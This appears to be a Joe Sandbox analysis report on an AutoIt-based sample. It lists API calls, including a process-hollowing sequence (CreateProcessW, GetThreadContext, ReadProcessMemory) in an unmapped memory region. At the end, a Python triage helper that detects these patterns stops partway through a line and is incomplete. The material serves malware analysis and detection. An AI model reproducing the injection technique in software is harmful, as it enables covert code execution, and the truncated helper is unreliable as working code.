                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                • API String ID: 98802146-2727554177
                                                                                • Opcode ID: 4e9366e7a7de4f4167abdd054062997253b3e10a1d79ba988c9d7ee14829fce4
                                                                                • Instruction ID: 8242ff6da22076c9baa103c76eae84895858cff74ecb8bb2bf988659163b016e
                                                                                • Opcode Fuzzy Hash: 4e9366e7a7de4f4167abdd054062997253b3e10a1d79ba988c9d7ee14829fce4
                                                                                • Instruction Fuzzy Hash: D471AE714443029EC714EF69DCA58ABBBE9FF86750F40182FF58583260EB74AA48CF52

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetSysColorBrush.USER32(0000000F), ref: 005D2B8E
                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 005D2B9D
                                                                                • LoadIconW.USER32(00000063), ref: 005D2BB3
                                                                                • LoadIconW.USER32(000000A4), ref: 005D2BC5
                                                                                • LoadIconW.USER32(000000A2), ref: 005D2BD7
                                                                                • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 005D2BEF
                                                                                • RegisterClassExW.USER32(?), ref: 005D2C40
                                                                                  • Part of subcall function 005D2CD4: GetSysColorBrush.USER32(0000000F), ref: 005D2D07
                                                                                  • Part of subcall function 005D2CD4: RegisterClassExW.USER32(00000030), ref: 005D2D31
                                                                                  • Part of subcall function 005D2CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 005D2D42
                                                                                  • Part of subcall function 005D2CD4: InitCommonControlsEx.COMCTL32(?), ref: 005D2D5F
                                                                                  • Part of subcall function 005D2CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 005D2D6F
                                                                                  • Part of subcall function 005D2CD4: LoadIconW.USER32(000000A9), ref: 005D2D85
                                                                                  • Part of subcall function 005D2CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 005D2D94
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                • String ID: #$0$AutoIt v3
                                                                                • API String ID: 423443420-4155596026
                                                                                • Opcode ID: 97b48bc258768ce6bf64ebb1c7ab3b65e3596867caa2393bdefd589cde972e3f
                                                                                • Instruction ID: 18c2268aee73dce6d041230a9f13eb41993d55b765fef6ae60d03cf6059125ac
                                                                                • Opcode Fuzzy Hash: 97b48bc258768ce6bf64ebb1c7ab3b65e3596867caa2393bdefd589cde972e3f
                                                                                • Instruction Fuzzy Hash: 47211A74E00314AFDF10AFA5EC55AA97FF6FB4AB60F00101AE504AA6A0D7B12A40CF90

                                                                                 Control-flow Graph
                                                                                 • Graph rendering not reproduced; basic blocks 5d3170-5d326d and 612d9c-612e96, with calls to DefWindowProcW, KillTimer, SetTimer, RegisterWindowMessageW, CreatePopupMenu, PostQuitMessage, MoveWindow and SetFocus
                                                                                APIs
                                                                                • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,005D316A,?,?), ref: 005D31D8
                                                                                • KillTimer.USER32(?,00000001,?,?,?,?,?,005D316A,?,?), ref: 005D3204
                                                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 005D3227
                                                                                • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,005D316A,?,?), ref: 005D3232
                                                                                • CreatePopupMenu.USER32 ref: 005D3246
                                                                                • PostQuitMessage.USER32(00000000), ref: 005D3267
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                • String ID: TaskbarCreated
                                                                                • API String ID: 129472671-2362178303
                                                                                • Opcode ID: aca23ec3a5e083c49591c6a6397ac37c1a8bd12a043b1dfe4d39c4fbfd999af2
                                                                                • Instruction ID: 8e81bdae0e3874294409674844df09396b25aaa47e9548416c1085355eca7878
                                                                                • Opcode Fuzzy Hash: aca23ec3a5e083c49591c6a6397ac37c1a8bd12a043b1dfe4d39c4fbfd999af2
                                                                                • Instruction Fuzzy Hash: 3141E639640506AADB342FACDC2D7BA3E1BFB47350F081527F541893A1C6A19E40DBA2
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: D%j$D%j$D%j$D%j$D%jD%j$Variable must be of type 'Object'.
                                                                                • API String ID: 0-1847616689
                                                                                • Opcode ID: 757e005bd2071611ff83f62d3de6d66b5bce2a8fdb2c274d238a8bffc3056527
                                                                                • Instruction ID: 817ae15fc5e84626e83b451858b9db57e6be1dc833380a7c92db72247cab2bd2
                                                                                • Opcode Fuzzy Hash: 757e005bd2071611ff83f62d3de6d66b5bce2a8fdb2c274d238a8bffc3056527
                                                                                • Instruction Fuzzy Hash: 25C2AC70A00615CFCB24EF58D886AADBBB2BF49300F24856BE945AF391D735ED41CB91

                                                                                 Control-flow Graph
                                                                                 • Graph rendering not reproduced; basic blocks 1a6a5c8-1a6a8ca, with calls to CreateFileW, VirtualAlloc, ReadFile, VirtualFree and CloseHandle
                                                                                APIs
                                                                                • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01A6A699
                                                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01A6A8BF
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1472344836.0000000001A67000.00000040.00000020.00020000.00000000.sdmp, Offset: 01A67000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_1a67000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: CreateFileFreeVirtual
                                                                                • String ID:
                                                                                • API String ID: 204039940-0
                                                                                • Opcode ID: 640a513b0a1dc75cf27b9d1dcd7263df352c7e5bc7e4f1208c2f85c57f315c64
                                                                                • Instruction ID: d7adbb852d5a2f81670913ce10a0959ab6e3ab619a2da2068b177de1851c45ff
                                                                                • Opcode Fuzzy Hash: 640a513b0a1dc75cf27b9d1dcd7263df352c7e5bc7e4f1208c2f85c57f315c64
                                                                                • Instruction Fuzzy Hash: 14A11C74E00209EBDB14CFA4C998BEEBBB9FF48704F208559E611BB281D7799A41CF54

                                                                                 Control-flow Graph
                                                                                 • Graph rendering not reproduced; single basic block 5d2c63-5d2cd3, with two calls to CreateWindowExW and two calls to ShowWindow
                                                                                APIs
                                                                                • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 005D2C91
                                                                                • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 005D2CB2
                                                                                • ShowWindow.USER32(00000000,?,?,?,?,?,?,005D1CAD,?), ref: 005D2CC6
                                                                                • ShowWindow.USER32(00000000,?,?,?,?,?,?,005D1CAD,?), ref: 005D2CCF
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Window$CreateShow
                                                                                • String ID: AutoIt v3$edit
                                                                                • API String ID: 1584632944-3779509399
                                                                                • Opcode ID: cdb45b013b4631ff6e87ed1e6bf0be5e4780afb3ad880d3113f87b4672cd0cd1
                                                                                • Instruction ID: d41378e94a4aa311c1f6d7ad94e5a6d0a8956e32977f049ccdc68ccf9f44d8d5
                                                                                • Opcode Fuzzy Hash: cdb45b013b4631ff6e87ed1e6bf0be5e4780afb3ad880d3113f87b4672cd0cd1
                                                                                • Instruction Fuzzy Hash: FAF0DA765402A07BEB312B17AC08E772EBFD7C7F60F01205AF900EA5A0C6A52850DEB0

                                                                                 Control-flow Graph
                                                                                 • Graph rendering not reproduced; basic blocks 1a6a348-1a6a57c, with calls to CreateFileW, VirtualAlloc, ReadFile and ExitProcess
                                                                                APIs
                                                                                  • Part of subcall function 01A6A238: Sleep.KERNELBASE(000001F4), ref: 01A6A249
                                                                                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01A6A4B3
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1472344836.0000000001A67000.00000040.00000020.00020000.00000000.sdmp, Offset: 01A67000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_1a67000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: CreateFileSleep
                                                                                • String ID: 01178EZEGL0OKLW9YBL8YPEEIBN1P6
                                                                                • API String ID: 2694422964-3978621138
                                                                                • Opcode ID: 7acae570ae09f24f8b1a857ab526ec89e3b8d0aeb47b513ce85d22bdc7c38276
                                                                                • Instruction ID: 2db59285998a643ca8dceaf93fb4dc47325df2eb85268fe7ff05a5635266c343
                                                                                • Opcode Fuzzy Hash: 7acae570ae09f24f8b1a857ab526ec89e3b8d0aeb47b513ce85d22bdc7c38276
                                                                                • Instruction Fuzzy Hash: 58618430D04288DAEF12DBF8D848BEEBB79AF15304F044199E6487B2C1D7B90B45CB66

                                                                                 Control-flow Graph
                                                                                 • Graph rendering not reproduced; basic blocks 642947-642cf6, with calls to DeleteFileW and CopyFileW
                                                                                APIs
                                                                                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00642C05
                                                                                • DeleteFileW.KERNEL32(?), ref: 00642C87
                                                                                • CopyFileW.KERNELBASE(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00642C9D
                                                                                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00642CAE
                                                                                • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00642CC0
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: File$Delete$Copy
                                                                                • String ID:
                                                                                • API String ID: 3226157194-0
                                                                                • Opcode ID: 25c2167395748d5288b4565f5fbcf6786a697bf690bf21efc7d53f88d83aec74
                                                                                • Instruction ID: e923ec9d9936429de03cc282c9dcfaecb72f35fb7ec676fec69b1678ee6b1cf5
                                                                                • Opcode Fuzzy Hash: 25c2167395748d5288b4565f5fbcf6786a697bf690bf21efc7d53f88d83aec74
                                                                                • Instruction Fuzzy Hash: 8FB16171D0011EABDF25DBA4CC99EEE7B7EEF48354F5040A6F609E6241EA309A448F61

                                                                                 Control-flow Graph
                                                                                 • Graph rendering not reproduced; basic blocks 605aa9-605cb4, with calls to WriteFile and GetLastError
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: JO]
                                                                                • API String ID: 0-3765940103
                                                                                • Opcode ID: 5541e94367b20924d37bef0053b5f561889ee93b16767cfa8810d6486d2a109b
                                                                                • Instruction ID: f2e1d0329876f839b2f73def01402b5162ebecb92f999d089e60f11c903dc5b6
                                                                                • Opcode Fuzzy Hash: 5541e94367b20924d37bef0053b5f561889ee93b16767cfa8810d6486d2a109b
                                                                                • Instruction Fuzzy Hash: 6551EE7598060A9FDF29AFA4C849AFFBFBAAF45314F14001AE402A72D1D7759901CF61

                                                                                 Control-flow Graph
                                                                                 • Graph rendering not reproduced; basic blocks 5d3b1c-5d3b9b, with calls to RegOpenKeyExW, RegQueryValueExW and RegCloseKey
                                                                                APIs
                                                                                • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,005D3B0F,SwapMouseButtons,00000004,?), ref: 005D3B40
                                                                                • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,005D3B0F,SwapMouseButtons,00000004,?), ref: 005D3B61
                                                                                • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,005D3B0F,SwapMouseButtons,00000004,?), ref: 005D3B83
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: CloseOpenQueryValue
                                                                                • String ID: Control Panel\Mouse
                                                                                • API String ID: 3677997916-824357125
                                                                                • Opcode ID: 7ffc909cf339578d7fba8c564678d06e5fc652883d6ad6d866434e598f4dd5c3
                                                                                • Instruction ID: d1556b42bb5398e3045e85049612467eac6fbfbd4be9dab7ce884f9f24f3ef89
                                                                                • Opcode Fuzzy Hash: 7ffc909cf339578d7fba8c564678d06e5fc652883d6ad6d866434e598f4dd5c3
                                                                                • Instruction Fuzzy Hash: 4D112AB5510208FFEB208FA9DC44AAEBBB8FF04754B10486BE845D7210E2719E409761
                                                                                APIs
                                                                                • CreateProcessW.KERNELBASE(?,00000000), ref: 01A699F3
                                                                                • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01A69A89
                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01A69AAB
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1472344836.0000000001A67000.00000040.00000020.00020000.00000000.sdmp, Offset: 01A67000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_1a67000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                • String ID:
                                                                                • API String ID: 2438371351-0
                                                                                • Opcode ID: 932a8f43b2c324a6e880b45aa11ae59a53f266e36399e6caa3e7e9a692624255
                                                                                • Instruction ID: 06dba067258f5ac308e28550a9e18fa79c48998decdd6f04410ec0e1b3c962cc
                                                                                • Opcode Fuzzy Hash: 932a8f43b2c324a6e880b45aa11ae59a53f266e36399e6caa3e7e9a692624255
                                                                                • Instruction Fuzzy Hash: B6620C30A14258DBEB24CFA4C840BDEB776EF58304F1091A9D20DEB394E7769E85CB59
                                                                                APIs
                                                                                • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 006133A2
                                                                                  • Part of subcall function 005D6B57: _wcslen.LIBCMT ref: 005D6B6A
                                                                                • Shell_NotifyIconW.SHELL32(00000001,?), ref: 005D3A04
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: IconLoadNotifyShell_String_wcslen
                                                                                • String ID: Line:
                                                                                • API String ID: 2289894680-1585850449
                                                                                • Opcode ID: 0faa3f927dcabc8495e412fec43abdd6f703956b4fbeab3d0e647aa1c7c38cea
                                                                                • Instruction ID: 405c494728e2e71e948c36302ee6df4c00669a1c576d2f101c4e7f57cde8fc4a
                                                                                • Opcode Fuzzy Hash: 0faa3f927dcabc8495e412fec43abdd6f703956b4fbeab3d0e647aa1c7c38cea
                                                                                • Instruction Fuzzy Hash: 5C31E471508315AAC730EF18DC49BEB7BD9BB81710F00192BF59987291EB70AA49CBD3
                                                                                APIs
                                                                                • GetOpenFileNameW.COMDLG32(?), ref: 00612C8C
                                                                                  • Part of subcall function 005D3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,005D3A97,?,?,005D2E7F,?,?,?,00000000), ref: 005D3AC2
                                                                                  • Part of subcall function 005D2DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 005D2DC4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Name$Path$FileFullLongOpen
                                                                                • String ID: X$`ei
                                                                                • API String ID: 779396738-2233648704
                                                                                • Opcode ID: 153c8ef50e648fe4d0f87817de6873216a005d84ff3e0afe826df91f39f91041
                                                                                • Instruction ID: b5cd6713bb099c023baa0cf24eebfaa974cc761fe90043afdf41e64bbd8b026e
                                                                                • Opcode Fuzzy Hash: 153c8ef50e648fe4d0f87817de6873216a005d84ff3e0afe826df91f39f91041
                                                                                • Instruction Fuzzy Hash: C321A470A002589BCF51EF98C8097EE7FFDAF89304F00805BE505A7341DBB455898FA1
                                                                                APIs
                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 005F0668
                                                                                  • Part of subcall function 005F32A4: RaiseException.KERNEL32(?,?,?,005F068A,?,006A1444,?,?,?,?,?,?,005F068A,005D1129,00698738,005D1129), ref: 005F3304
                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 005F0685
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Exception@8Throw$ExceptionRaise
                                                                                • String ID: Unknown exception
                                                                                • API String ID: 3476068407-410509341
                                                                                • Opcode ID: 593ad0fd865226da02cffb4a1ccfa9f4366711bcec2b7b801e602d5124f7fda7
                                                                                • Instruction ID: dc7787ec63988373f9cc98afaf1f7e836778af451b09b29b53fc9fac0934e644
                                                                                • Opcode Fuzzy Hash: 593ad0fd865226da02cffb4a1ccfa9f4366711bcec2b7b801e602d5124f7fda7
                                                                                • Instruction Fuzzy Hash: 5BF0C23490020E778F04BAA5EC4ACBE7F6D7E80350B644531BB14DA5D2EF75EA25CA81
                                                                                APIs
                                                                                • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 0064302F
                                                                                • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00643044
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Temp$FileNamePath
                                                                                • String ID: aut
                                                                                • API String ID: 3285503233-3010740371
                                                                                • Opcode ID: 3f91d474bf3a1fd5f9eea40c334500c31d4fc57d925b7aefa84b9028a59c07dd
                                                                                • Instruction ID: c24454339bb40827f6aab72caeb39d105decb2c8b72e37f8d6b6eaddeb545e62
                                                                                • Opcode Fuzzy Hash: 3f91d474bf3a1fd5f9eea40c334500c31d4fc57d925b7aefa84b9028a59c07dd
                                                                                • Instruction Fuzzy Hash: 6BD05B7150031467DB209794DC0DFD73A6CD704760F000151BA95D2091DAF49644CAD0
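The three function blocks above each carry an API sequence an analyst would want to check mechanically rather than by eye: the read of HKCU\Control Panel\Mouse (SwapMouseButtons) at 005D3B1C, the CreateProcessW / Wow64GetThreadContext / ReadProcessMemory chain at 01A699F3 inside a region the report marks "based on PE: false", and GetTempFileNameW with prefix "aut" at 0064302F. The Python below is an added triage helper written for this edit; it is not part of the Joe Sandbox report and not Joe Sandbox code. It parses the report's "APIs" lines (the embedded sample is a constructed excerpt of those three blocks, copied as printed), folds Wow64 and A/W variants so a rule is written once, and flags: the process-hollowing (RunPE) prologue, reading the 4-byte ReadProcessMemory after GetThreadContext as consistent with fetching PEB->ImageBaseAddress from the suspended child; the AutoIt runtime's %TEMP%\aut*.tmp naming; and the mouse-swap registry lookup as AutoIt runtime noise rather than credential access. The rule names, severities and the Call/Finding types are the example's own assumptions.

```python
"""Triage helper for Joe Sandbox 'APIs' listings (added example, not part of the
report or of Joe Sandbox). Parses lines such as
    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01A69A89
into per-function call lists and flags sequences worth an analyst's attention."""
import re
from dataclasses import dataclass

# Constructed sample input: the 'APIs' lines of three function blocks from the
# report, copied as printed there. A real run would feed the exported report text.
SAMPLE_REPORT = """
APIs
• RegOpenKeyExW.KERNELBASE(80000001,Control Panel\\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,005D3B0F,SwapMouseButtons,00000004,?), ref: 005D3B40
• RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,005D3B0F,SwapMouseButtons,00000004,?), ref: 005D3B61
• RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,005D3B0F,SwapMouseButtons,00000004,?), ref: 005D3B83
APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 01A699F3
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01A69A89
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01A69AAB
APIs
• GetTempPathW.KERNEL32(00000104,?,00000001), ref: 0064302F
• GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00643044
"""

# One API line: optional bullet, optional 'Part of subcall function X:' prefix,
# then 'Name.MODULE(args), ref: ADDR'. CRT refs such as '__dosmaperr.LIBCMT ref: ...'
# have no argument list, so the parenthesised group is optional.
API_LINE = re.compile(
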